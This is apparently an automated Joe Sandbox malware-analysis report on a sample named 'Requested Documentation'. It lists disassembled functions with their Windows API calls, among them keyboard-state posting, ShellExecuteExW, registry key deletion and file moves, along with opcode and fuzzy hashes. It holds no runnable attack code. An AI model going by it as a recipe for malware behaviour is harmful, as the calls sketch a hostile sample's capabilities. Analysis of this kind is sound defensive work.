                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
                                                                              • Instruction ID: ccd705550d603a4f9486e7eaadaadbd2e6acd72b7f9647d3cf02778bb139dab0
                                                                              • Opcode Fuzzy Hash: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
                                                                              • Instruction Fuzzy Hash: 0A412B74608680AFCB3DEBA8DD88B6B7B99AF86310F148C1DE057967E1C635D842D711
                                                                              Function 009E70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 009E70DD
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009E7114
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 009E7130
                                                                              • _memmove.LIBCMT ref: 009E717E
                                                                              • _memmove.LIBCMT ref: 009E719B
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 009E71AA
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009E71BF
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 009E71DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 256516436-0
                                                                              • Opcode ID: 6985de8e5bf26b2d5965f5445f42d09d1ae76ce75bca3ea6d58f367489adfa77
                                                                              • Instruction ID: 23670b030b3197d30cb7ffb0d452dc17a5bf7fadba9fbd5b6ddd32c01cb0229d
                                                                              • Opcode Fuzzy Hash: 6985de8e5bf26b2d5965f5445f42d09d1ae76ce75bca3ea6d58f367489adfa77
                                                                              • Instruction Fuzzy Hash: 06317072900205EFCF10EFA5DC85AAEB778EF89310F1441A5F904AB246DB709E11DBA1
                                                                              Function 00A061D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00A061EB
                                                                              • GetDC.USER32(00000000), ref: 00A061F3
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A061FE
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A0620A
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A06246
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A06257
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A0902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A06291
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A062B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
                                                                              • Instruction ID: 06c0c8ce03ce5eb486580e63714148d3e396daf7ec6fc56c745831f8f39b335c
                                                                              • Opcode Fuzzy Hash: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
                                                                              • Instruction Fuzzy Hash: 9C314F72101218BFEF218F50DC8AFEA3BA9EF49765F044065FE08AA191D7759C52CB74
                                                                              Function 009DBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID:
                                                                              • API String ID: 2931989736-0
                                                                              • Opcode ID: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
                                                                              • Instruction ID: d226ec2d6661a0f6c98e605bd04233049185fcdd9b2e453ec30345ed04f11718
                                                                              • Opcode Fuzzy Hash: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
                                                                              • Instruction Fuzzy Hash: DE21C261681205BBA6046A399D42FFB779CBF56388F058423FE0596743EB28DE2183E1
                                                                              Function 009EEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                              • _wcstok.LIBCMT ref: 009EEC94
                                                                              • _wcscpy.LIBCMT ref: 009EED23
                                                                              • _memset.LIBCMT ref: 009EED56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: 3e874151b6a7a0537f35b5cb878dc9da2f6787ae56131c39131bd5f41ce191b6
                                                                              • Instruction ID: 6194d90e276ff66464c399ee35ea6ad6e9e57153aa2a11e2a920211b5d0106c1
                                                                              • Opcode Fuzzy Hash: 3e874151b6a7a0537f35b5cb878dc9da2f6787ae56131c39131bd5f41ce191b6
                                                                              • Instruction Fuzzy Hash: DDC16A716083419FC765EF64D881B6AB7E4BF85314F14492DF8999B3A2DB30EC45CB82
                                                                              Function 00981424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
                                                                              • Instruction ID: 8499e55215c6239e187281d1102884fb46b9820271e1dcc5a25b3e4ff757e335
                                                                              • Opcode Fuzzy Hash: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
                                                                              • Instruction Fuzzy Hash: 5A716F31900109EFDB14DFA8CC89EBEBB79FF85320F148159F915AA351C774AA52CB60
                                                                              Function 009F6B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 36c79c91444af3da46abb21888f72c145b22ad979c1a9059269b5bdb74e84e0c
                                                                              • Instruction ID: 6cfec27dc4038e5f91729b068464bcb316519b8153a5726f177ae517f4b340c6
                                                                              • Opcode Fuzzy Hash: 36c79c91444af3da46abb21888f72c145b22ad979c1a9059269b5bdb74e84e0c
                                                                              • Instruction Fuzzy Hash: 28618A72208304ABC710EB64CC86F7BB7A8AFD4714F54491DF6569B2E2DA70AD05CB92
                                                                              Function 00A0B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(01356108), ref: 00A0B3EB
                                                                              • IsWindowEnabled.USER32(01356108), ref: 00A0B3F7
                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A0B4DB
                                                                              • SendMessageW.USER32(01356108,000000B0,?,?), ref: 00A0B512
                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 00A0B54F
                                                                              • GetWindowLongW.USER32(01356108,000000EC), ref: 00A0B571
                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A0B589
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                              • String ID:
                                                                              • API String ID: 4072528602-0
                                                                              • Opcode ID: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
                                                                              • Instruction ID: 848cb78e872ad5b7055593a5cd6781b4a26b0d20c1f16c160038c97b6725cbd8
                                                                              • Opcode Fuzzy Hash: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
                                                                              • Instruction Fuzzy Hash: 6D71A338610208EFDB20DF64EA94FBA77B5EF49300F144459FA45972E2C732AA41DB61
                                                                              Function 009FF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009FF448
                                                                              • _memset.LIBCMT ref: 009FF511
                                                                              • ShellExecuteExW.SHELL32(?), ref: 009FF556
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                              • GetProcessId.KERNEL32(00000000), ref: 009FF5CD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009FF5FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 3522835683-2766056989
                                                                              • Opcode ID: b8a7aa09eb063b88e40a3f213b6a0942220ee8b84312da755b2bd0463a2b7bb5
                                                                              • Instruction ID: be9c3d5f0e906dfd5f0a7f4cd2d60c723822095ff8da2706ee411039d801ed31
                                                                              • Opcode Fuzzy Hash: b8a7aa09eb063b88e40a3f213b6a0942220ee8b84312da755b2bd0463a2b7bb5
                                                                              • Instruction Fuzzy Hash: 6E619E75A006199FCF14EFA4C495ABEBBF5FF89314F148069E855AB351CB30AD41CB90
                                                                              Function 009E0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 009E0F8C
                                                                              • GetKeyboardState.USER32(?), ref: 009E0FA1
                                                                              • SetKeyboardState.USER32(?), ref: 009E1002
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 009E1030
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 009E104F
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 009E1095
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009E10B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
                                                                              • Instruction ID: ee8b4483283e05761b1dc135c6edcb5248b19e9d4a91b011742a7e1ab079673d
                                                                              • Opcode Fuzzy Hash: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
                                                                              • Instruction Fuzzy Hash: 1F5113B06087D53EFB3742358C15BBABEAD6B46300F088989E1D4968D3C2E9ECD9D751
                                                                              Function 009E0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 009E0DA5
                                                                              • GetKeyboardState.USER32(?), ref: 009E0DBA
                                                                              • SetKeyboardState.USER32(?), ref: 009E0E1B
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009E0E47
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009E0E64
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009E0EA8
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009E0EC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
                                                                              • Instruction ID: 361c62d8f51a6c4e10b209c8f56a59c8cfdfed684b5fe81a498e0378910e9824
                                                                              • Opcode Fuzzy Hash: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
                                                                              • Instruction Fuzzy Hash: E55102A05087D53DFB3383768C45B7ABEAD6B86300F08899DE1D8568C2C3E5ACD9D760
                                                                              Function 009E55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
                                                                              • Instruction ID: 854e42d2e01ead5c9e9e1b46c5fceb19c35e482e5eec322fc36a2c056ba59942
                                                                              • Opcode Fuzzy Hash: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
                                                                              • Instruction Fuzzy Hash: 1741A465C1065476CB12EBB88C46BCFB3BC9F86310F508956F508E3221EB34E655C7E6
                                                                              Function 009E3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 009E36B7
                                                                              • _wcscmp.LIBCMT ref: 009E36D3
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E36EB
                                                                              • _wcscat.LIBCMT ref: 009E3733
                                                                              • SHFileOperationW.SHELL32(?), ref: 009E379F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 1377345388-1173974218
                                                                              • Opcode ID: 9f81368f3de736da47ae412f15d66131b5e48adbadc658c940b4851d73af9636
                                                                              • Instruction ID: 052ab6cd0e464a6733135931d7897559fb8d1c825b3d488b4bbdaf650318565e
                                                                              • Opcode Fuzzy Hash: 9f81368f3de736da47ae412f15d66131b5e48adbadc658c940b4851d73af9636
                                                                              • Instruction Fuzzy Hash: CF41B371508384AEC752EF65C446ADFB7ECAF89390F00482EF499C3251EB34DA89CB52
                                                                              Function 00A07291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A072AA
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07351
                                                                              • IsMenu.USER32(?), ref: 00A07369
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A073B1
                                                                              • DrawMenuBar.USER32 ref: 00A073C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              • Opcode ID: f6e826454518e712ae085dbe52dd7253e79f0f86c5112bde93fabfe125b9e538
                                                                              • Instruction ID: beec0ac7ac413a4edbca313b78060e1f228f2744dd82513446a4165fa1977b0e
                                                                              • Opcode Fuzzy Hash: f6e826454518e712ae085dbe52dd7253e79f0f86c5112bde93fabfe125b9e538
                                                                              • Instruction Fuzzy Hash: F8411875A04208EFEB20DFA0E884A9EBBF4FB05314F148529FD55AB290D731AD51EF51
                                                                              Function 00A00FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A00FD4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A00FFE
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A010B5
                                                                                • Part of subcall function 00A00FA5: RegCloseKey.ADVAPI32(?), ref: 00A0101B
                                                                                • Part of subcall function 00A00FA5: FreeLibrary.KERNEL32(?), ref: 00A0106D
                                                                                • Part of subcall function 00A00FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A01090
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A01058
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 395352322-0
                                                                              • Opcode ID: 17222ca0e3408ab0a9e33288e1ac29797fd95c43619e72c2913adc4c138065e5
                                                                              • Instruction ID: 47a9570d45486237138e3eb66d64eca78c0cdb7d42fcd088bb3fa1ff617a6a50
                                                                              • Opcode Fuzzy Hash: 17222ca0e3408ab0a9e33288e1ac29797fd95c43619e72c2913adc4c138065e5
